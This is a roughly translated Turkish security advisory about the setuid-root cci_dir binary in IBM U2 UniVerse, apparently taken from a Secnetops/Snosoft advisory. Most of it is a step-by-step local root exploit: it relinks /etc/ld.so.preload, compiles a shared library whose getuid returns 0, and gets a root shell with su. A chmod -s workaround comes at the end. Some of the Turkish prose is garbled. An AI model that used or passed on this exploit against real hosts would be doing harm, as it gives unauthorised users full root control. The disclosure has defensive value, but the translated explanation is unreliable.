IBM U2 UniVerse
cci_dir creates hard links as root
Çeviren : Cyber-Warrior Haberci Grubu (ColaTurca)
IBM in yenilikçi olmasi sayesinde bunlar yayimlanmistir.
Bu sebebten dolayi ilk olarak geçmisten hatirladigimiz "Snosoft"
u tekrar canlandirmaliyiz.
http://www.secnetops.biz bu adresten bakilabilir.
Amacimiz
Güncel olan bir çok güvenlik sistemleri vardir.bunlar örneklenirse, trusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security olarak siralayabilirz.Iste bizim amacimiz
bu güvenlik sistemlerini kolaylastirmak ve en cazip hale getirmek.
Özetlenmis Baslik
Tavsiye edilen no: SRT2003-07-X-XXXX
Ürün: IBM U2 UniVerse
Version: Version <= 10.0.0.9 (DGUX = 7.3.2.1)
Satici: http://ibm.com/software/data/u2/universe/
Sinif:Yerel
Elestirirlik:Yüksek
Sysstem: DGUX, Linux
Yüksek seviye açiklamasi
cci_dir baslangiç için zor bir baglantidir.
Tekniksel Detaylar
Proof Of Concept Status
Database in öyle bir sekilde dizayn edilmistir ki ilgili istek alanlarini genisletebilir.
Operating sistemi kullaniciya genis bi alan sunabilmekte ve bu database le
hacker dosyalari sistem çalisiyorken gönderebilir.Bu dosyalarin bilesiminde
root a bir çok yol gösterebilir.
Bu da yalnizca çok bölünebilirligiyle mümkün olabilir.
http://digitaldefense.net bu adreste bu dediklerimi onaylamaktadir.
link("/etc/passwd", "/tmp/test") = -1 EXDEV (Invalid cross-device
link
Bu link hata bildirimidir.
Bu sonuçlari örneklerle gösterebiliriz
[rootvegeta bin]# ls -al ./cci_dir
-rwsr-x--x 1 root bin 10328 Apr 3 21:57 ./cci_dir
[rootvegeta bin]# ltrace ./cci_dir USER_SUPPLIED USER_SUPPLIED2
...
link("USER_SUPPLIED", "USER_SUPPLIED2") = -1 kullanilmaz
kiliyor.
rootvegeta bin]# touch a
[rootvegeta bin]# ltrace ./cci_dir a b
...
link("a", "b") = 0
unlink("a") = 0
Simdi bunlarin nasil uzlastigina bakalim.(ROOT LARIN)
Ilk hedefim etc/ld.so.preload. dir.Dosya zaten varoldugu için bu belgeleri
birbirine baglayamamayiz.
kfvegeta kf]$ ls -al /etc/ld.so.preload
-rw-r--r-- 1 root root 0 Jul 7 20:03 /etc/ld.so.preload
[kfvegeta kf]$ /usr/ibm/uv/bin/cci_dir /etc/ld.so.preload isgone
Was unable to unlink file isgone/..
[kfvegeta kf]$ ls -al isgone
-rw-r--r-- 1 root root 0 Jul 7 20:03 isgone
[kfvegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload:Böyle bir dosya bulunmamakta !
Simdide atak için hazirlanim dökümanlara bakalim
kfvegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
^C
[kfvegeta kf]$ gcc -c -o oops.o oops.c
[kfvegeta kf]$ ld -shared -o oops.so oops.o
[kfvegeta kf]$ cat > owned
/home/kf/oops.so
^C
Bu preload dökümanlarini bir tarafa kaydetmeniz gerekiyor.
kfvegeta kf]$ ls -al /etc/ld.so.preload
-rw-rw-r-- 1 kf kf 18 Jun 27 18:41 /etc/ld.so.preload
[kfvegeta kf]$ cat /etc/ld.so.preload
/home/kf/oops.so
Simdi kolayca root alabilirsiniz.
kfvegeta kf]$ su -
[rootvegeta root]# id
uid=0(root) gid=0(root) groups=0(root)
Patch or Workaround : chmod -s /usr/ibm/uv/bin/cci_dir
Bu bilgiler bir güvenlik sistemi tarafindan verilmistir.herhangi bir soru oldugunda
yukardaki internet sayfasina bakilabilir
